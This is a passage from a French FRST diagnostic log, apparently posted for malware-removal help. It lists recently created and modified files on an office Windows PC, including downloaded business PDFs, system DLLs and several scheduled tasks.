2022-05-16 12:58 - 2022-05-16 12:58 - 000336592 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance (2).pdf 2022-05-16 12:57 - 2022-05-16 12:57 - 000267668 _____ C:\Users\BUREAU DU MAS\Downloads\URSSAF-Autorisation-Prelevement-2881045234322 (1).pdf 2022-05-16 12:57 - 2022-05-16 12:57 - 000207331 _____ C:\Users\BUREAU DU MAS\Downloads\URSSAF-Autorisation-Prelevement-2881045234322.pdf 2022-05-16 12:54 - 2022-05-16 12:54 - 000120520 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance (1).pdf 2022-05-16 12:53 - 2022-05-16 12:53 - 000336592 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance.pdf 2022-05-14 16:07 - 2022-05-14 16:07 - 000014495 _____ C:\Users\BUREAU DU MAS\Downloads\Avis d_effets domiciliés Compte 19157 000203258 01 C_C Contrat Pro Global SARL SGH DU SUD__Date d_imputation _ 04_05_2022 au 2022-04-27.pdf 2022-05-13 16:01 - 2022-05-13 16:01 - 000060637 _____ C:\Users\BUREAU DU MAS\Downloads\vosTimbres.pdf 2022-05-13 15:59 - 2022-05-13 15:59 - 000065153 _____ C:\Users\BUREAU DU MAS\Downloads\etiquettes.pdf 2022-05-13 09:46 - 2022-05-13 09:46 - 000064084 _____ C:\Users\BUREAU DU MAS\Desktop\Registre-du-personnel-Modèle-Excel-gratuit.xlsx 2022-05-13 09:43 - 2022-05-13 09:43 - 000058663 _____ C:\Users\BUREAU DU MAS\Downloads\Registre-du-personnel-Modèle-Excel-gratuit.xlsx 2022-05-13 07:09 - 2022-05-13 07:09 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll 2022-05-13 07:09 - 2022-05-13 07:09 - 000188928 _____ C:\WINDOWS\system32\uwfcfgmgmt.dll 2022-05-13 07:09 - 2022-05-13 07:09 - 000093696 _____ C:\WINDOWS\system32\Drivers\cimfs.sys 2022-05-13 07:09 - 2022-05-13 07:09 - 000011799 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2022-05-13 06:59 - 2022-05-13 06:59 - 000000000 ___HD C:\$WinREAgent 2022-05-12 16:36 - 2022-05-12 16:36 - 000003842 _____ C:\WINDOWS\system32\Tasks\CCleanData 2022-05-11 15:39 - 2022-05-11 15:39 - 000178642 _____ C:\Users\BUREAU DU MAS\Downloads\995P0FAC2205000070_293230278.pdf 2022-05-10 17:08 - 2022-05-10 17:08 - 000003418 _____ C:\WINDOWS\system32\Tasks\Unlimited 2022-05-10 17:08 - 2022-05-10 17:08 - 000000000 ____D C:\ProgramData\Unlimited 2022-05-10 08:46 - 2022-05-10 08:46 - 000009153 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (9).pdf 2022-05-09 14:26 - 2022-05-09 14:28 - 000000000 ____D C:\Users\BUREAU DU MAS\Desktop\socotec ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-06-05 18:07 - 2019-10-11 18:54 - 000000000 ____D C:\Program Files (x86)\Google 2022-06-05 18:00 - 2019-10-14 11:47 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\Fichiers Outlook 2022-06-05 17:51 - 2020-08-31 19:40 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2022-06-05 16:10 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-06-05 15:44 - 2020-08-31 19:34 - 001771354 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-06-05 15:44 - 2019-12-07 16:50 - 000791866 _____ C:\WINDOWS\system32\perfh00C.dat 2022-06-05 15:44 - 2019-12-07 16:50 - 000150032 _____ C:\WINDOWS\system32\perfc00C.dat 2022-06-05 15:44 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF 2022-06-05 15:40 - 2020-08-31 19:40 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-06-05 15:40 - 2020-08-31 19:30 - 000008192 ___SH C:\DumpStack.log.tmp 2022-06-05 15:40 - 2020-08-31 19:30 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2022-06-05 15:40 - 2020-01-20 16:52 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2022-06-05 15:40 - 2019-10-11 17:40 - 000000000 ____D C:\ProgramData\NVIDIA 2022-06-05 09:35 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-06-05 09:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2022-06-05 08:38 - 2020-06-24 07:11 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-06-05 08:34 - 2020-08-31 19:31 - 000000000 ____D C:\Users\BUREAU DU MAS 2022-06-04 15:22 - 2019-10-31 13:06 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\PERSONNEL 2022-06-04 14:00 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2022-06-03 07:20 - 2019-10-14 11:12 - 000000000 ____D C:\ProgramData\Packages 2022-05-31 15:28 - 2021-12-11 12:07 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3818313502-2494511162-3174529094-1001 2022-05-31 15:28 - 2020-08-31 19:40 - 000003396 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3818313502-2494511162-3174529094-1001 2022-05-31 15:28 - 2020-08-31 19:31 - 000002445 _____ C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2022-05-30 16:47 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2022-05-17 09:20 - 2019-11-29 13:38 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\Documents réception 2022-05-14 09:16 - 2020-08-31 19:30 - 000368216 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2022-05-14 09:15 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\UNP 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Common Files\System 2022-05-13 07:13 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2022-05-13 06:57 - 2019-10-11 18:46 - 000000000 ____D C:\WINDOWS\system32\MRT 2022-05-13 06:54 - 2019-10-11 18:46 - 145501456 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2022-05-10 08:04 - 2020-08-31 19:40 - 000003690 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2022-05-10 08:04 - 2020-08-31 19:40 - 000003566 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2022-05-10 07:16 - 2019-10-14 12:16 - 000000000 ____D C:\Program Files (x86)\McAfee ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) ==================== Fin de FRST.txt ========================